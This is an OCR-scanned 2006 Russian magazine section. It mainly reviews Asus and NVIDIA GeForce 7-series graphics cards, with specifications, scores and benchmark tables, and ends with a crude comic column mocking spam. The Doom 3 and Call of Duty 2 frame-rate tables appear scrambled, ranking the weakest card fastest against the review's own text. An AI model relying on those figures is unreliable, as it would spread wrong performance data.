конфигах (тех же ini), которые можно 

без труда написатыотредактировать са- 
мому. Поэтому на данный момент 
NikSaver поддерживает готовые скрипты 
для более чем 200 программ и игр. Оте- 
чественный производитель не забыл 

о долге перед своим народом и сделал 
прогу фриварной для нас, для русских © 


ОФФТОПИК 


nard 


Пиратские карты. Тестирование видеокарт NVIDIA 


серии GeForce «7» 


ИСТОРИЧЕСКИ СЛОЖИЛОСЬ, ЧТО НА ПРОСТОРАХ НАШЕЙ РОДИНЫ 
ПОПУЛЯРНЫ КАРТЫ ОТ NVIDIA. НА ЭТОТ РАЗ МЫ ПОДГОТОВИЛИ ДЛЯ ТЕБЯ 
СУРОВЫЙ ОБЗОР КАРТ, ИЗГОТОВЛЕННЫХ КОМПАНИЕЙ ASUS, ПОСКОЛЬКУ 
ИМЕННО ЭТА КОНТОРА ВЕСЬМА ОРИГИНАЛЬНО ПОДОШЛА 

К ПРОЕКТИРОВАНИЮ РСВ И ОХЛАЖДЕНИЯ, А ТАКЖЕ НЕ ЗАБЫВАЕТ 
РАДОВАТЬ НАС ДОСТОЙНОЙ КОМПЛЕКТАЦИЕЙ 

ЕВГЕНИЙ ПОПОВ 


тестовый стенд: 
ПРОЦЕССОР, ГГЦ: 2.0, AMD Athlon 64 X2 3800+, Socket 939 


МАТЕРИНСКАЯ ПЛАТА: Albatron K8SLI 


ЧИПСЕТ: NVIDIA nForce4 SLI 


ПАМЯТЬ, MB: 1024, Corsair XMS 3500LL-Pro 


ВИНЧЕСТЕР, ГБ: 80, Seagate Barracuda, 7200 rpm 


БЛОК ПИТАНИЯ: 580, Hyper Type-R, HPU-4R580-MU 


> технологии. Как известно, карты Ha чипах NVIDIA GeForce 7 серии нача- 
ли свое существование с легендарного GeForce 7800 GTX, релиз которого 
состоялся еще прошлой весной. С того момента прошло больше года, 
и за это время мы получили большое количество интересных и разнообраз- 
ных карт данной линейки. Платы, рассматриваемые в данном тесте, построе- 
ны на основе одного из трех чипов: G70, G71, либо G73 — чем больше цифра 
в названии, тем старше графический процессор. Разница между чипами зак- 
лючается, в основном, в рабочих частотах и количестве пиксельных блоков. 
Переход с G70 на G71 проводился по следующей схеме: количество 
пиксельных и вершинных конвейеров не изменилось (цифры остались 
все те же — 24 и 8), но сменился техпроцесс, а вместе с ним и рабочая час- 
тота. Если GeForce 7800 GTX работал на 400 МГц, то в случае с GeForce 
7900 GTX эта цифра поднялась до 650 МГц. Низкая производительность чи- 
па G73, на котором основан, к примеру, GeForce 7600 СТ, объясняется не- 
высоким количеством конвейеров (12 пиксельных и 5 вершинных) и доволь- 
но скромной частотой. В принципе, этот чип является не более чем урезан- 
ной версией процессора G71. 


В отличие от G70, у обновленных процессоров довольно высокий 
разгонный потенциал. Этим, кстати, пользуются многие производители 
при выпуске своих карт — остается только оснастить девайс грамотной 
системой охлаждения. Кстати говоря, в данном тесте будет присутство- 
вать большое количество карточек с пассивным охлаждением — такая 
возможность появилась у производителей благодаря низкому энергопот- 
реблению и, как следствие, низкому тепловыделению чипов G71 и G73. 
Память, устанавливаемая на новые платы, в основном стандарта GDDR3, 
хотя изготовители зачастую устанавливают Ha Low-End девайсы и DDR2. 
Шина связи с GPU, как правило, используется 256-битная, но недорогим 
устройствам вроде GeForce 7600 СТ или GeForce 7300 GT приходится до- 
вольствоваться 128-битной шиной. К сожалению, некоторые устройства 
серии (в основном Hi-End) не могут быть модифицированы инженерами 
выпускающих компаний — NVIDIA наложила строгое вето на изменение 
дизайна, компоновки и охлаждения под страхом лишения гарантии 
на продукт. Пока что только карты среднего (и ниже) диапазона произво- 
дительности имеют возможность быть не такими как все. Однако хочется 
надеяться, что ситуация в скором времени изменится в лучшую сторону, 
и пользователи получат прекрасную возможность выбирать необходимую 
им модификацию той или иной платы. 
> — методика тестирования. В качестве традиционной части, то есть син- 
тетической, мы использовали известные бенчмарки 3DMark 2005 и 3DMark 
2006, прогоняемые на стандартных настройках, а вот к игровому тестирова- 
нию мы решили в этот раз подойти несколько иначе. Наши постоянные чи- 
татели обратили внимание на то, что в качестве платформ обычно исполь- 
зуются культовые Half-Life 2, Doom 3, F.E.A.R. и Far Cry. В данном случае 
от Far Cry мы решили избавиться и заменили данную игру на Call of Duty 2. 
Замеры производились на разрешениях 1024х768 и 1280х1024 в режимах 
с антиалайзингом и анизотропией, а также без них. 


Оценки 
Модель Охлаждение Комплектация Разгон Производительность Среднее Итого Цены 
Asus EN7950GX2 9 9 8 10 9 9 720 
Asus EN7900GTX 10 8 8 9 8.75 9 620 
NVIDIA GeForce 7900GT 8 8 8 7 7.75 8 370 
Asus EN7800GT Dual 9 7 7 9 8 8 750 
Asus EN7800GTX TOP 9 9 9 8 8.75 9 700 
Asus EN7800GTX 8 7 8 8 7.75 8 500 
Asus EN7800GT 8 7 8 7 7.5 7 350 
Asus EN7800GT Top Silent 10 7 8 7 8 8 330 
Asus EN7600GT Silent 9 7 8 6 7.5 7 230 
Asus EN7600GS Top Silent 9 7 8 6 7.5 7 170 
NVIDIA GeForce 7300GT 5 7 9 5 6.5 6 105 


ASUS EN7600GS 
TOP SILENT 
($170) 7 баллов 


ЧАСТОТА ПРОЦЕССОРА, МГЦ: 400 


ЧАСТОТА ПАМЯТИ, МГЦ: 270 (540) 


ПИКСЕЛЬНЫЕ КОНВЕЙЕРЫ: 12 


ВЕРШИННЫЕ КОНВЕЙЕРЫ: 5 


ОБЪЕМ ПАМЯТИ, MB: 512, DDR2 


ТЕХПРОЦЕСС, НМ: 90 


> — плюсы. Карты марки GeForce 
7600 стали первыми в серии, чьи ку- 
леры и РСВ могут претерпевать из- 
менения и модификации с разреше- 
ния NVIDIA. Чем, кстати, не забыли 
воспользоваться инженеры Asus, 
проектируя данное устройство. Ори- 
гинальный по своей конструкции ку- 
лер работает совсем бесшумно бла- 
годаря отсутствию вентилятора, 
впрочем, радиатор у него огромный. 
Две ребристых алюминиевых плас- 
тины сжимают в своих тисках плату 
четырьмя винтами, а специальные 


ASUS 
EN7800GTX TOP 
($550) 9 баллов 


ЧАСТОТА ПРОЦЕССОРА, МГЦ: 485 


ЧАСТОТА ПАМЯТИ, МГЦ: 675 (1350) 


ПИКСЕЛЬНЫЕ КОНВЕЙЕРЫ: 24 


ВЕРШИННЫЕ КОНВЕЙЕРЫ: 8 


ОБЪЕМ ПАМЯТИ, MB: 256, GDDR3 


ТЕХПРОЦЕСС, НМ: 110 


> — плюсы. В свое время это уст- 
ройство стало реальным прорывом 
в области 30 и предметом много- 
численных обсуждений на оверк- 
локерских форумах. На той же 
волне поднялась и компания HIS 
со своими системами охлажде- 
ния IceQ. Плата ASUS EN7800GTX 
ТОР стала одной из первых, ис- 
пользующих охлаждение турбинно- 
го типа. Вентилятор для своих раз- 
меров работает предельно тихо, 


ASUS EN7800GT 
DUAL 
($690) 8 баллов 


ЧАСТОТА ПРОЦЕССОРА, МГЦ: 2х430 


ЧАСТОТА ПАМЯТИ, МГЦ: 600 (1200) 


ПИКСЕЛЬНЫЕ КОНВЕЙЕРЫ: 20 


ВЕРШИННЫЕ КОНВЕЙЕРЫ: 7 


ОБЪЕМ ПАМЯТИ, MB: 512, GDDR3 


ТЕХПРОЦЕСС, НМ: 110 


> — плюсы. В свое время компа- 
ния ASUS обожала экспериментиро- 
вать с двухпроцессорными картами. 
Многие из вариантов были не очень 
удачными — плохая разводка, 
слишком громоздкое охлаждение, 
ужасающие размеры. Однако ASUS 
7800GT Dual избавлена от всех этих 
недостатков, что позволяет ей пока- 
зывать не только хорошую произво- 
дительность, но и недюжинную 


резинки предохраняют GPU от ско- 
ла. Но и это еще не все — с обрат- 
ной стороны платы имеется допол- 
нительный радиатор. Легким движе- 
нием пользователь может перевести 
его в перпендикулярное положе- 
ние — таким образом, производится 
дополнительный отвод тепла, что 
открывает новые горизонты для раз- 
гона. Площадь рассеивания исполь- 
зуется эффективнее благодаря теп- 
ловой трубке, которая пронзает за- 
фиксированный тыльный охлади- 
тель и дугой уходит в ось разворота 
мобильного радиатора. Плата снаб- 
жена 512 Мб DDR2 памяти и готова 
работать в SLI. 

> — минусы. Из бонусов в коробке 
имеется только гейм-пак с тремя иг- 
рушками и три переходника. 

На GDDR3-namatu производитель 
сэкономил. Также не ясно, почему 
радиатор охлаждает только графи- 
ческий процессор, а память оста- 
ется «голой». 


а с процессором соприкасается 
толстенная медная пластинка. 

В случае с этой картой инженеры 
не только модифицировали охлаж- 
дение, но и заранее разогнали 

и чип, и память. Плата не блещет 
новизной и производительностью 
по сегодняшним меркам, но комп- 
лектация этого устройства может 
служить примером другим произ- 
водителям: куча всевозмож- 

ных СО, переходников, а также 
стильный кейс для дисков. 

> — минусы. Претензий к карте 
практически нет, разве что к габари- 
там и объему памяти. Жаль, что 
производитель поскупился 

на 512 Мб и оснастил плату в два 
раза меньшим объемом. Охлаждаю- 
щий агрегат даже по сегодняшним 
меркам довольно громоздок — 
пластиковый кожух может помешать 
установке в некоторые корпуса. 


функциональность. Охлаждение 
устройства представляет собой сис- 
тему из двух радиаторов и вентиля- 
тора по центру. Карточка традици- 
онно упакована в огромную короб- 
ку, в которой, помимо устройства, 
находятся стандартные переходни- 
ки, шнуры, диски, кейс для CD, 

а также блок внешнего питания. 
Плата имеет особый разъем на пе- 
редней панели и может питаться 
как от БП, так и от обычной 220 

В сети. Кстати, замечательна мо- 
дель еще и тем, что была выпущена 
ограниченным числом экземпляров 
и представляет собой коллекцион- 
ную ценность. 

> — минусы. На передней панели 
нет вентиляционных отверстий 

для выброса бловером нагретого 
воздуха. Дизайн карты может поме- 
шать установке в некоторые корпуса. 
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ASUS EN7900GTX 
($530) 9 баллов 


ЧАСТОТА ПРОЦЕССОРА, МГЦ: 650 


ЧАСТОТА ПАМЯТИ, МГЦ: 800 (1600) 


ПИКСЕЛЬНЫЕ КОНВЕЙЕРЫ: 24 


ВЕРШИННЫЕ КОНВЕЙЕРЫ: 8 


ОБЪЕМ ПАМЯТИ, МБ: 512, GDDR3 


ТЕХПРОЦЕСС, НМ: 90 


> — плюсы. Что бы ни говорили 
скептики, но эта плата до сих пор 
является ярчайшим представителем 
класса Hi-End. Сама карта по своим 
размерам является просто гигантом! 
Усовершенствованная система ох- 
лаждения, которую мы видели 

в других моделях (например, 

в ASUS 7800GT Dual), из серии «два 
радиатора и вентилятор в центре», 
позволяет прибегать к серьезному 
разгону без замены охладителя. Ин- 
женеры присовокупили к данной 


ASUS EN7800GT 
($330) 7 баллов 


ЧАСТОТА ПРОЦЕССОРА, МГЦ: 400 


ЧАСТОТА ПАМЯТИ, МГЦ: 500 (1000) 


ПИКСЕЛЬНЫЕ КОНВЕЙЕРЫ: 20 


ВЕРШИННЫЕ КОНВЕЙЕРЫ: 7 


ОБЪЕМ ПАМЯТИ, MB: 256 GDDR3 


ТЕХПРОЦЕСС, НМ: 110 


> плюсы. Данный девайс являет- 
ся менее производительной версией 
Asus EN7800 GTX, но зато более де- 
шевой. Скажем прямо, выглядит он 
гораздо стильнее «старшего» собра- 
та. Как ты можешь судить по харак- 
теристикам, карточка выглядит 
скромнее не только в плане рабочих 
частот, но и конвейеров. Выполнена 
она на синем текстолите, а кулер 
подсвечивают голубые диоды — 

в совокупности мы имеем очень 
симпатичный, почти «моддинговый» 


ASUS EN7600GT 
SILENT 
($230) 7 баллов 


ЧАСТОТА ПРОЦЕССОРА, МГЦ: 560 


ЧАСТОТА ПАМЯТИ, МГЦ: 700 (1400) 


ПИКСЕЛЬНЫЕ КОНВЕЙЕРЫ: 12 


ВЕРШИННЫЕ КОНВЕЙЕРЫ: 5 


ОБЪЕМ ПАМЯТИ, МБ: 256, GDDR3 


ТЕХПРОЦЕСС, НМ: 90 


> — плюсы. Еще одна карта с сис- 
темой охлаждения парусного типа. 
Это устройство выполнено на зеле- 
ном текстолите и обладает весьма 
компактными размерами. Стоит за- 
метить, что все компоненты платы 
довольно свободно расположены. 
Память выполнена на четырех схе- 
мах Samsung с временем отклика 
1.4 нс. С процессором контактирует 
прямоугольная пластинка, сквозь 
которую пропущены две тепловые 
трубки — одна из них идет на «па- 


композиции еще и две тепловых 
трубки. С чипами контакт произво- 
дится через медные пластинки, 

а вентиляционные отверстия на пе- 
редней панели и пластиковый кожух 
рождают подобие турбины (превос- 
ходная идея, которой подчас недос- 
тает другим моделям). 

> — минусы. Вентилятор шумит во- 
истину сильно! Дополнительные же 
децибелы пользователь с легкостью 
обретает в процессе разгона. Если ты 
жаждешь приобрести данное устрой- 
ство, то совершенно не обязательно 
выбирать между двумя производите- 
лями — бери любую, поскольку плата 
полностью повторяет референсный 
дизайн и компонов ку. Кинг Конг на 
коробке, на самой плате (в виде нак- 
лейки), а также внутри упаков- 

ки (диск с игрой) — слишком уж 
странная любовь у производителя 

к этой знаменитой обезьяне... 


дизайн. На металлическом кожухе 
блистает логотип производителя. 
Сама система охлаждения практи- 
чески не претерпела изменений, хо- 
тя подход к использованию тепло- 
вой трубки здесь гораздо грамот- 
нее. Она выписывает широкую дугу, 
что позволяет более эффективно 
использовать площадь рассеяния. 
Ребрение на подложке радиатора 
более частое, что тоже плюс. Длина 
платы уменьшилась — это может 
порадовать владельцев компактных 
корпусов. Комплектация платы 

та же, что и в варианте с Asus 
EN7800GTX, только кожаный CD- 
кейс заменен на пластиковый, а иг- 
рушек в наборе поменьше. 

> — минусы. Радиатора на сило- 
вых элементах нет, а вентилятор 
работает довольно шумно. Во вре- 
мя продолжительной работы это на- 
чинает сильно бесить. 


рус», а другая огибает плату и кре- 
пится внутри радиатора с тыльной 
стороны. Тот, в свою очередь, ни 

с одним элементом карты, кроме 
скромной подставки, контакта 

не имеет. 

> — минусы. Из-за своей принад- 
лежности к классу «чуть ниже сред- 
него» эта плата обладает некоторы- 
ми минусами, связанными, прежде 
всего, с охлаждением. Как было 
сказано ранее, композиция из ради- 
аторов заботится только о процессо- 
ре. Память остается фактически го- 
лой. Исходя из этого, мы задаемся 
вопросом: каков же смысл в уста- 
новке такого неординарного охлаж- 
дающего комплекса, если можно 
было теоретически обойтись мас- 
сивным медным теплообменником? 
Кстати, радиатор с тыльной стороны 
платы практически не закреплен, 
что в скором времени может при- 
вести к его деформации. 


ASUS EN7950GX2 
($660) 9 баллов 


ЧАСТОТА ПРОЦЕССОРА, МГЦ: 2х500 


ЧАСТОТА ПАМЯТИ, МГЦ: 600 (1200) 


ПИКСЕЛЬНЫЕ КОНВЕЙЕРЫ: 2х24 


ВЕРШИННЫЕ КОНВЕЙЕРЫ: 2х8 


ОБЪЕМ ПАМЯТИ, MB: 2х512, GDDR3 


ТЕХПРОЦЕСС, НМ: 90 


> плюсы. Данное устройство яв- 
ляется самым мощным и производи- 
тельным на сегодняшний день. Плата 
представляет собой две идентичные 
карты, соединенные в режиме SLI, 
причем по отдельности не функцио- 
нирующие. Специальный чип позво- 
ляет работать одновременно двум 
частям устройства без использова- 
ния SLI-mocta, то есть плата может 
по праву считаться полноценным 
одиночным девайсом. Каждая поло- 
винка платы снабжена 512 Мб памя- 
ти GDDR3. Охлаждение работает до- 
вольно тихо, однако качество алюми- 
ниевого радиатора-«гармошки» ос- 
тавляет желать лучшего. Архитекту- 
ра видеопроцессора CineFX 4.0 под- 
держивает шейдерную модель реви- 
зии 3.0, что позволяет повысить ка- 
чество эффектов и скорость выпол- 
нения операций. 

> — минусы. Из-за нестандартного 
РСВ инженерам не удалось предус- 
мотреть так хорошо зарекомендовав- 
шую себя систему турбинного типа. 
Плата полностью повторяет рефе- 
ренс от NVIDIA, и никаких существен- 
ных добавлений от производителя 

не наблюдается. Коробка, как всегда 
и непонятно почему, монструозных 
размеров. Комплектация минималь- 
на, а цена максимальна. 


Е. Е. А. В. 
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ASUS EN7800GTX 
($470) 8 баллов 


* лучшая * ЧАСТОТА ПРОЦЕССОРА, МГЦ: 430 
покупка ЧАСТОТА ПАМЯТИ, МГЦ: 600 (1200) 
* * ПИКСЕЛЬНЫЕ КОНВЕЙЕРЫ: 24 


ВЕРШИННЫЕ КОНВЕЙЕРЫ: 8 


хх 


ОБЪЕМ ПАМЯТИ, МБ: 256, GDDR3 


ТЕХПРОЦЕСС, НМ: 110 


> плюсы. Недавно этот девайс 
был героем в 30, теперь же это стоп- 
роцентный Middle-End. Что приятно, 
плата обладает сниженным по срав- 
нению с поколением NVIDIA 

GeForce 6 энергопотреблением. 

Чип изготовлен по 110 нм процессу и 
использует 24 пиксельных и 8 вер- 
шинных конвейера. На карточке ис- 
пользована система охлаждения 

с низкой посадкой — алюминиевая 
подложка с тепловой трубкой накры- 
та радиатором. Обдувается вся эта 
композиция небольшой крыльчаткой. 
Сверху установлена пластиковая нак- 
ладка. Небольшой радиатор установ- 
лен и на силовых схемах устройства. 
Карта имеет шестиконтактный порт 
для дополнительного питания. Как это 
и положено, видеокарта способна ра- 
ботать в SLI-pexume и упакована в ог- 
ромную красочную коробку. В ней 

по традиции находятся переходники, 
комплект малополезных дисков, 

а также кейс под CD. 

> — минусы. Вентилятор шумит, 

а сама плата является копией рефе- 
ренса от NVIDIA — на ней нет даже 
логотипа ASUS. Соответственно, до- 
полнительных «фишек» не предус- 
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мотрено. 
DOOM 3 3D Mark 2006, 1280 x 1024, Default Test 
Модель 1024 х 768 1280 x 1024 1024 x 768 1280 x 1024 Модель 
видеокарты (AA+AF) (AA+AF) видеокарты 
NVIDIA GeForce 7300GT 121 120 115 96 NVIDIA GeForce 7300GT 2174 
Asus EN7600GS Top Silent 104 91 85 73 Asus EN7600GS Top Silent 3043 
Asus EN7600GT Silent 95 79 59 46 Asus EN7600GT Silent 3365 
Asus EN7800GT 111 101 86 71 Asus EN7800GT 4654 
Asus EN7800GT Top Silent 98 80 61 49 Asus EN7800GT Top Silent 4696 
NVIDIA GeForce 7900GT 92 73 54 41 NVIDIA GeForce 7900GT 4876 
Asus EN7800GTX 81 64 46 32 Asus EN7800GTX 4913 
Asus EN7800GTX TOP 82 66 47 32 Asus EN7800GTX TOP 5164 
Asus EN7800GT Dual 77 61 43 27 Asus EN7800GT Dual 5447 
Asus EN7900GTX 75 60 41 25 Asus EN7900GTX 5932 
Asus EN7950GX2 54 41 22 11 Asus EN7950GX2 7123 
Call of Duty 2 3D Mark 2005, 1024 x 768, Default Test 
Модель 1024 x 768 1280 x 1024 1024 x 768 1280 x 1024 Mogenb 
видеокарты (AA+AF) (AA+AF) видеокарты 
NVIDIA GeForce 7300GT 121 119 112 89 Asus EN7950GX2 13987 
Asus EN7600GS Top Silent 120 103 95 70 Asus EN7900GTX 11836 
Asus EN7600GT Silent 81 63 47 32 NVIDIA GeForce 7900GT 9632 
Asus EN7800GT 101 83 75 69 Asus EN7800GT Dual 10472 
Asus EN7800GT Top Silent 82 64 49 34 Asus EN7800GTX TOP 9993 
NVIDIA GeForce 7900GT 77 59 42 30 Asus EN7800GTX 9605 
Asus EN7800GTX 63 49 36 25 Asus EN7800GT 8863 
Asus EN7800GTX TOP 66 51 38 26 Asus EN7800GT Top Silent 8872 
Asus EN7800GT Dual 60 45 32 21 Asus EN7600GT Silent 7532 
Asus EN7900GTX 58 43 30 20 Asus EN7600GS Top Silent 7104 


Asus EN7950GX2 42 35 15 8 NVIDIA GeForce 7300GT 5987 


NVIDIA GEFORCE 
7300GT 
($100) 6 баллов 


ЧАСТОТА ПРОЦЕССОРА, МГЦ: 350 


ЧАСТОТА ПАМЯТИ, МГЦ: 333 (667) 


ПИКСЕЛЬНЫЕ КОНВЕЙЕРЫ: 8 


ВЕРШИННЫЕ КОНВЕЙЕРЫ: 4 


ОБЪЕМ ПАМЯТИ, МБ: 256, DDR2 


ТЕХПРОЦЕСС, НМ: 90 


> — плюсы. Эта плата направлена 
на бюджетный сектор рынка и явля- 
ется полной копией референса. Она 
построена на основе чипа G73-VZ- 
N-A2 — именно так обозначается 
последняя серия чипов G73, идущих 
на изготовление плат NVIDIA 
GeForce 7300GT. Обрати внима- 
ние — это все тот же G73, только 


усеченный на один четырехкон- 
вейерный блок (квад). Несмотря 

на свою якобы неполноценность, 
чип прекрасно разгоняется. GPU 
распаян на укороченной РСВ, при- 
чем охлаждением обеспечен только 
сам процессор. Память Infineon со 
временем отклика 2 нс. Ширина ши- 
ны памяти составляет 128 бит. Сис- 
тема охлаждения представляет со- 
бой тонкую алюминиевую пластинку 
с двумя ребрами по краям, в центре 
которой расположился крошечный 
вентилятор. 

> — минусы. На кулер нанесена 
термопроводящая «жвачка» вместо 
пасты, что отрицательно сказывает- 
ся на охлаждении. Память остается 
без охлаждения. Вентилятор работа- 
ет очень шумно. 


NVIDIA GEFORCE 
7900GT 
($350) 8 баллов 


ЧАСТОТА ПРОЦЕССОРА, МГЦ: 450 


ЧАСТОТА ПАМЯТИ, МГЦ: 660 (1320) 


ПИКСЕЛЬНЫЕ КОНВЕЙЕРЫ: 24 


ВЕРШИННЫЕ КОНВЕЙЕРЫ: 8 


ОБЪЕМ ПАМЯТИ, MB: 256, GDDR3 


ТЕХПРОЦЕСС, НМ: 90 


> — плюсы. Данная плата является 
урезанной версией старшей карты 

в серии — как это было с NVIDIA 
GeForce 7800 GTX и NVIDIA GeForce 
7800 GT. Но если тогда инженеры 
просто понизили частоты, то здесь 
этим не ограничилось — дополни- 
тельно был снижен объем памяти до 
256 Мб. Чип остался прежним — не 
«урезанный» G71. Слабенький кулер 
представляет собой композицию из 


медного радиатора гармошкой 

и крошечного вентилятора. Память 
по традиции расположена полукру- 
гом и выполнена на восьми схемах 
Samsung со временем отклика 

1.4 нс. К сожалению, ничего про 
комплектацию сказать мы не можем, 
поскольку эта плата приехала к нам 
в лабораторию без упаковки и явля- 
ется тестовым образцом. 

> — минусы. Скажем прямо, плата 
нам не очень понравилась из-за 
подхода производителя к охлажде- 
нию. Даже на референсе NVIDIA 
GeForce 6600СТ установлена более 
толковая и качественная система. 
Так что для разгона либо требуется 
докупать что-то серьезное, либо ис- 
кать более качественные варианты 
у различных производителей. Здесь 
же память осталась без охлажде- 
ния, а вентилятор сильно шумит. 


ASUS EN7800GT 
TOP SILENT 
($350) 8 баллов 


ЧАСТОТА ПРОЦЕССОРА, МГЦ: 420 


ЧАСТОТА ПАМЯТИ, МГЦ: 620 (1240) 


ПИКСЕЛЬНЫЕ КОНВЕЙЕРЫ: 20 


ВЕРШИННЫЕ КОНВЕЙЕРЫ: 7 


ОБЪЕМ ПАМЯТИ, MB: 256, GDDR3 


ТЕХПРОЦЕСС, НМ: 110 


> плюсы. Устройство обладает 
эталонным дизайном, но производи- 
тель позволил себе заменить чипы 
памяти со временем 2 нс на модули 
с выборкой 1.6 нс, которые более 
предрасположены к разгону. Подве- 
рглись изменениям и частоты: вмес- 
то референсных здесь мы имеем де- 


ло с 420/1240 МГц. Главной особен- 
ностью является пассивное охлаж- 
дение Top Silent. Память и процес- 
сор скрыты под толстым алюминие- 
вым радиатором, а тепловая трубка, 
которая проходит сквозь теплооб- 
менник, служит одновременно 

и осью дополнительного поворотно- 
го радиатора. Передвигаемый в по- 
ложение «паруса», радиатор повы- 
шает интенсивность отвода тепла 

и может обдуваться вентилятором 
на процессоре. 

> — минусы. Так как радиатор ох- 
лаждается за счет процессорного 
кулера, то хорошо бы заиметь 

на CPU как можно более мощный 
девайс. В итоге от шума в корпусе 
не избавится. 


> — выводы. Из всего многообразия карт, представленных в тесте, каждый 
найдет себе что-то по душе. Но мы же обращаем внимание на устройства, 
проявившие себя наилучшим образом. Напомним, что «Выбор редакции» 
вручается самому производительному и функциональному девайсу, а награ- 
ду «Лучшая покупка» получает устройство с наилучшим соотношением цены 
и качества. Раздавать награды в данном случае было очень легко. Без заз- 
рения совести мы отдаем «Выбор редакции» карте Asus EN7950GX2 


как флагману всей седьмой серии карт NVIDIA GeForce. «Лучшую покупку» 
получает Asus EN7800GT — когда-то эта видеокарта была героем многочис- 
ленных тестов, однако мы считаем, что ее век еще не прошел, и девайс ус- 
пешно справляется со всеми поставленными перед ним задачами. 


Редакция выражает благодарность за предоставленное на тестирование 
оборудование российским представительствам компаний ASUS и NVIDIA. 


ОФФТОПИК 


crew 


НУ ЧТО ЖЕ, ЭТОТ СПЕЦВЫПУСК ОСОБЫЙ, 
ПОЭТОМУ И Е-МЕЙЛЫ У НАС БУДУТ 
ОСОБЕННЫЕ. Я ВОЗЬМУ ГИГАНТСКУЮ ПО- 
ЖАРНУЮ КИШКУ, ПОДКЛЮЧУ ЕЕ К ИСТОЧНИКУ 
КАНАЛИЗАЦИОННЫХ СТОКОВ И ПОСРЕДСТВОМ 
СУПЕР-ЯДЕРНОЙ ПОМПЫ ИЗВЕРГНУ МОЩНЫЙ ПО- 
ТОК В СТОРОНУ СПАМА. А ВЫ ПО-ПРЕЖНЕМУ 
ПИШИТЕ ПИСЬМА НА SPEC@REAL.XAKEP.RU! 
DR. KLOUNIZ 


18 декабря 2006 г. 


Однодневный бизнес-курс тел. 


МАРКЕТИНГОВЫЕ ИССЛЕДОВАНИЯ: подходы и методики. 

Как выбрать оптимальную методику и агентство под мои бизнес задачи? Что 
можно сделать самостоятельно, а что поручить исследовательскому агентству? 
Преимущества и недостатки известных на рынке исследовательских продук- 
тов? Как контролировать качество работы исследовательского агентства? 


Что можно сделать самостоятельно? Самостоятельно можно только 
отрезать голову автору данного письма, наполнить ее радиоактив- 
ными отходами и запустить в космической ракете на Марс. Пусть 
зеленые космические пришельцы занимаются вопросами бизнес-за- 
дач и оценкой качества исследовательского агентства, ведь земля- 
не еще со времен социализма знают, что есть три продажные девки 
империализма — статистика, генетика и кибернетика. Долой ста- 
тистику! 


приглашаем вас принять участие 
в уникальном тренинге: 
«Возврат долгов или как убедить дебитора» 


Психологические и организационные основы кредитного менеджмента. Основ- 
ные проблемы в работе по сбору долгов и пути их решения. Стили ведения пе- 
реговоров. Умение владеть собой и ситуацией. Личностные особенности пере- 
говорщика. Реализация плана по возврату долгов (дебиторской задолженнос- 
ти). Аргументация позиции при переговорах: ценность, цена, польза. Когда лю- 
ди покупают соотношение цены и ценности. Обоснование цены. Основные 
правила работы с ценой. Фактическая ценность и ценность для потребителя. 
Поведение в сложных ситуациях. Технологии и механизмы манипуляции. За- 
щита от манипуляции. Виды и механизмы защит. Завершение обсуждения и 
фиксация договоренностей. Техники снятия эмоционального напряжения. 


Ну что, приступим ко второму нашему пациенту. Как возвратить 
долги и убедить дебитора — тут, наверное, про всякие утюги, паяль- 
ники и прочее отрезание пальцев. Известная русская традиция, 

не будем на ней останавливаться. Стили ведения переговоров? Ту- 
да же. А вот техники снятия эмоционального напряжения — это бо- 
лее ценный навык. Как уж тут не вспомнить Ивана Драго, нашего 


национального героя из фильма «Красная Жара». Как вы, русские, 
снимаете стресс? Водкой! В то время как американские коллеги 
смотрят на аквариум с разноцветными рыбками. 


& видео, фотостудия предлагает вам! 


Профессиональную видео, фото съемку, производство корпоративных, 
представительских и рекламных фильмов, монтаж, 3D графику. А так же 
выездной фотосалон с историческими костюмами, различные развлека- 
тельные аттракционы (Электрический выключатель, Фан-казино). Супер 
предложение заказ звезд эстрады. 


Отличное предложение для эстетов, желающих пригласить на свой 
новогодний огонек мэтров отечественного телеящика типа Евгения 
Петросяна или Елены Степаненко! Все это можно снять, потом 

на основе снятого совершить действующие ЗО-модели, а затем — 
поиграть в супер-игру «Электрический выключатель» от американс- 
кого правительства или «Фан-казино» от нашего. 


праздник неизбежен 
Подарок должен быть убийственен! Мы позаботились за вас... 


А вы знаете, кем были ваши предки? Что значит ваша фамилия? 


Праздник точно неизбежен. Как говорит один мой знакомый гине- 
колог: «Прерванный половой акт — это праздник, который всегда 
с собой». Очень радует, что вы о нас позаботились. А предки на- 
ши были могучими викингами, они плавали на своих драккарах 

к Оловянным Островам, ездили из варяг в греки и били всяких 
древних спамеров секирами. 


новая коллекция постельного 
белья на сайте, хотите посмотреть? 


** 


Так же Вы можете отписаться от нашей рассылки (мы Вас больше не по- 
беспокоим) 


Получим специальный ответ от Ская (хоть из редакции он и уво- 
лился, но счета за скачанные им по корпоративному инету «Чу- 


деса Строгинских подворотен, сексуальных беспределов в общаге 
МАИ и тому подобные «Русские версии греческих анальных прик- 
лючений в клубах» приходят до сих пор): «Нет, не хочу! Мы бы 
лучше посмотрели новую коллекцию не постельного белья, а вся- 
ких постельных сцен и желательно на халяву. Ну почему спам 
нам отказывает в такой малости? Прислали бы честно ссылочку 
на хотя бы стомегабайтный архивчик на рапидшаре, вот тогда мы 
бы порадовались». 


участникам рынка 626 


RK 


Участникам рынка B2B. Продажа «сложного» товара требует OT менедже- 
ров особых навыков. Менеджеры, владеющие такими навыками, заметно 
выделяются на фоне общей массы продавцов. Перед ними всегда откры- 
ты все двери, а люди принимающие решения никогда не отказываются их 
выслушать. 

«Современная система продаж сложных товаров на рынке В2В» 
18-19 декабря. Программа ознакомит с основными инструментами эф- 
фективных продаж и поможет приобрести навыки ведения переговоров. 


Учиться чему-то у людей, прибегающих к спаму? Это же моветон. 
Уж они научат, как продавать самый сложный товар, и самое 
главное — какими способами его рекламировать. 


схемы и методы расчетов 
и минимизации налогов. 
7—8 декабря 


Как в соответствии с современным законодательством сократить налого- 
вые выплаты? Как рассчитать налоги и избежать ошибок? Как грамотно 
отстаивать интересы компании в налоговых спорах? Ответы на эти воп- 
росы и консультацию специалиста по налоговому планированию Вы полу- 
чите, посетив наш практический семинар. 


Ну и под занавес — очередная реклама закона незаконным мето- 
дом. Хотя неизвестно, чему такому плохому они будут учить лю- 
дей на этом семинаре. 


© ООО «ХХХ» 


Предлагаем поставки следующих ле- 
соматериалов железнодорожным 
транспортом по России: 
— Балансы сосновые ГОСТ 9463-88 
— Балансы елово-пихтовые 
ГОСТ 9463-88 
— Фанерный кряж ГОСТ 9462-88 
— Пиломатериалы хвойные: обрезные, 
необрезные ГОСТ 8486-86 
— Шпалы ГОСТ 78-89 
